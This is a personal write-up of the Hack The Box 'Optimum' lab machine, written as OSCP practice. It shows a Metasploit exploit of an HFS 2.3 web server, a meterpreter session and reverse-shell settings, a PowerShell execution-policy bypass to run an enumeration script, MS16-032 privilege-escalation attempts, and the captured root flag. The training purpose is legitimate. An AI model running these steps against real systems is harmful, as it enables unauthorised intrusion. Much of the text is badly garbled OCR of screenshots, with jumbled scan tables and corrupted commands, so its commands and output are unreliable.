This is my approach to solving HTB’s Optimum CTF

 

JOURNEY TO OSCP Optimum Difficulty: Points: Release: Windows Easy 20 18 Mar 2017 10.13.10.8

 

NMAP:

 

UDP Scan:

 

Scanned PORT 53/udp .1 67/udp 68/udp 69/udp 123/udp 135/udp .1 137/udp .1 138/udp .1 139/udp .1 161/udp 162/udp 445 .1 500/udp 514/udp 520/udp .1 631/udp 1434/udp 1900/udp 4500/udp .1 at 2021-04-22 STATE filtered EDT SERVICE domain dhcps dhcpc t ftp ntp msrpc netbios-ns netbios-dgm netbios -ssn snmp for 351s open I filtered open I filtered open I filtered open I filtered filtered filtered filtered filtered open I filtered open I filtered filtered open I filtered open I filtered filtered open I filtered open I filtered open I filtered filtered filtered snmptrap microsoft-ds isakmp sys log route i pp ms-sql-m upnp nat-t-ike unknown REASON host-unreach no- response no- response no- response no- response host-unreach host-unreach host-unreach host-unreach no- response no- response host-unreach no- response no- response host-unreach no- response no- response no- response host-unreach host-unreach f rom f rom f rom f rom f rom f rom f rom f rom f rom 10. 10. 10. 10. OS 10.10. 14 10.10 .14 10.10. 14 10.10. 14 10.10 .14 49152/udp .14 .14 14 14. 1 ttl ttl ttl ttl ttl ttl ttl ttl ttl VERSION 64 64 64 64 64 64 64 64 64 Too many fingerprints match this host to give specific TCP/IP fingerprint: details SCAN - pc -linux-gnu) TRACEROUTE HOP RTT (using port 137/udp) ADDRESS ms 10.10.14.1 1 2 128.72 . 30

 

TCP:

 

 

HFS 2.3:

Looking at the website I see rejetto and so I put rejetto in searchsploit:

 

 

I also go to google and get these results:

 

I see both a maunal Exploit and a Metasploit point of attack.

 

I try to do both for practice for the OSCP

 

 

Metasploit:

 

 

 

 

Sysinfo:

meterpreter > pwd C:\Users\kostas\Desktop meterpreter > sysinfo Computer OPTIMUM os . Windows 2012 R2 Architecture x64 System Language Domain HTB Logged On Users . 1 Meterpreter x64/windows meterpreter > (Build 9600).

 

So I have a 64 bit archtechture so this is where I would like to be.

 

Getuid:

meterpreter > getuid Server username: OPTIMUM\kostas meterpreter >

 

The getuid is kostas, so I’m going to have to do some Privilege Escalation

 

I’m going to background this session and go to suggestor:

 

 

I’m going to use post/multi/recon/local_exploit_suggester:

 

Choose options, set session to 1 and then run it:

 

***Fun Fact*** on 64 bit machines its not easy to get many exploits from the local exploit suggestor.

 

Unfortunately nothing came through:

ms f ms f post > run Collecting local exploits for x64/windows. 16 exploit checks are being tried... Post module execution completed post >

 

So now that means I’ll have to do some manual exploitation

 

Manual Exploitation:

To help my manual enumeration of the system I’m choosing:


Sherlock rastamouse

 

Or I could go back to my meterprerter and go back to sessions and get information:

 

meterpreter > sysinfo Computer OPTIMUM os . Windows 2012 R2 Architecture x64 System Language Domain HTB Logged On Users . 1 Meterpreter x64/windows meterpreter > (Build 9600).

 

And put this information into google:

 

Looking at exploitdb I see that there is a Powershell Inovke command of MS16-032:

 

So I go back to metasploit and background the session and searched for ms16-032:

meterpreter > backgroud [-] Unknown command: backg roud. meterpreter > background Backgrounding session 1. msf post > search ms16-@32 [!] Module database cache not built yet, using slow search Matching Modules Name exploit/windows/local/ms16 032 secondary _ logon handle privesc Disclosure Date 2016-03-21 Rank normal Description MS16-@32 Secondary Logon Handle Privilege Escalation

 

I set the target to 1:

msf exploit > options Module options (exploit/windows/local/ms16 032 secondary _ logon handle privesc): Name SESSION Current Setting Required Description yes The session secondary_logon secondary_logon secondary_logon secondary_logon to run handle handle handle handle this module on. Exploit target: Id Name Windows x86 msf exploit (windows/LocaL/ms16 session 1 msf exploit (windows/LocaL/ms16 Exploit targets: 032 032 032 032 _ privesc) _ privesc) _ privesc) _ privesc) > set session 1 > show targets Id 1 Name Windows x86 Windows x64 msf exploit (windows/LocaL/ms16 target 1 msf exploit (windows/LocaL/ms16 > set target 1

 

Setup the lhost and lport and ran the script

 

***Note this script doesn’t always want to run so fingers crossed:

msf exploit (windows/LocaL/ms16 lhost tun@ msf exploit (windows/LocaL/ms16 Iport 443 ms f exploit (windows/LocaL/ms16 032 032 032 secondary_logon secondary_logon secondary_logon handle handle handle _ privesc) _ privesc) _ privesc) > > > set lhost tun@ set Iport 443 run Started reverse TCP handler on Writing payload file, txt. Compressing script contents. Compressed size: 3601 Executing exploit script. .

 

No dice:

msf exploit (windows/LocaL/ms16 lhost tun@ msf exploit (windows/LocaL/ms16 Iport 443 032 032 032 secondary_logon secondary_logon secondary_logon handle handle handle _ privesc) _ privesc) _ privesc) > > > set lhost tun@ set Iport 443 run msf msf exploit (windows/LocaL/ms16 Started reverse TCP handler on Writing payload file, txt. Compressing script contents. Compressed size: 3601 Executing exploit script. . Cleaned up txt Exploit completed, but no session was created . exploit (windows 16 _ 032 _ )

 

So now I have to truly try a more manual approach

 

 

Sherlock:

 

Go back to the Sherlock site and copy the “Sherlock.ps1” code into text file and call it whatever you like

 

Then go back to metasploit and type in sessions 1:

msf exploit (windows/LocaL/ms16 032 _ > sessions 1 Starting interaction with 1... meterpreter >

 

And type in “shell”:

meterpreter > shell Process 2492 created. Channel 4 created. Microsoft Windows [Version (c) 2013 Microsoft Corporation. All rights reserved.

 

Now go back to the terminal where you copied and pasted the sherlock code and create a python server:

 

 

Go back to metasploit and use certutil to get the code file:

 

 

Do “dir” to make sure the file made it over:

 

dir Volume in drive C has no label. Volume Serial Number is 760 . 320 16 . 664 Directory 29/04/2021 29/04/2021 29/04/2021 29/04/2021 18/03/2017 29/04/2021 18/03/2017 of C:\Users\kostas\Desktop 09:41 ee 09:41 ee 03:11 ee 09:41 ee 03:13 ee 4 File(s) 3 Dir(s) <DIR> <DIR> 32 CvtPer. txt hfs . exe sherd . PSI user. txt . txt 778.618 bytes bytes free C: \Users\kostas\Desktop>

 

Now I’m going to execute the file:

. exe -exec bypass -Command "& {Import-module .\sherd . PSI; Find-AllVulns}" powershell . exe -exec bypass -Command "& {Import-Module .\sherd . PSI; Find-AllVulns}"

 

As its running its showing what is vulnerable and what is not:

 

 

Something I’m going to do:

 

Go to Windows Exploit Suggester and clone the code from github

 

 

Make sure to update it: python windows-exploit-suggester.py –update

 

So before running Windows Exploit Suggester, go back to metasploit and type in “systeminfo”

 

Copy the output information and place it in a text file, you can call it whatever you want but my file is called “sysinfo.txt”

 

 

User.txt:

 

With all this stuff going on, I forgot to look for the User.txt file here it is below:

Is 'Is' is not recognized as an internal or external command, operable program or batch file. dir Volume in drive C has no label. Volume Serial Number is 760 . 320 16 . 664 Directory 29/04/2021 29/04/2021 29/04/2021 29/04/2021 18/03/2017 29/04/2021 18/03/2017 of C:\Users\kostas\Desktop 09:41 ee 09:41 ee 03:11 ee 09:41 ee 03:13 ee 4 File(s) 3 Dir(s) <DIR> <DIR> <DIR> 32 CvtPer. txt hfs . exe sherd . PSI user. txt . txt 778.618 bytes bytes free C: user. txt. txt type user. txt . txt

 

 

I’m not going to lie, since I couldn’t get Windows exploit suggerstor to work I went to go look at Walkthroughs.

 

I found: https://www.exploit-db.com/exploits/41020

 

 

After all that:

C: \lJsers>cd Administrator cd Administrator C: rator>dir dir Volume in drive C has no label. Volume Serial Number is Directory 18/03/2017 18/03/2017 18/03/2017 18/03/2017 18/03/2017 18/03/2017 18/03/2017 18/03/2017 18/03/2017 18/03/2017 18/03/2017 18/03/2017 18/03/2017 of C:\Users\Administrator 02. •52 02. •52 02. •52 03. • 14 02. •52 02. •52 02. •52 02. •52 02. •52 02. •52 02. •52 02. •52 02. •52 File(s) 13 Dir(s) <DIR> <DIR> <DIR> <DIR> <DIR> <DIR> <DIR> <DIR> <DIR> <DIR> 31. 898.673. Contacts Desktop Documents Downloads Favorites Links Music Pictures Saved Games Sea rches Videos bytes 152 bytes free C: \Users\Administrator>cd Desktop cd Desktop dir Volume in drive C has no label. Volume Serial Number is Directory of C: \Users\Administrator\Desktop 18/03/2017 18/03/2017 18/03/2017 03:14 ee 03:14 ee 03:14 ee <DIR> <DIR> 1 File(s) 2 Dir(s) 31.898.673. type root . txt 51ed1b36553c8461f4552c2e92b3eeed 32 root . txt 32 bytes 152 bytes free root . txt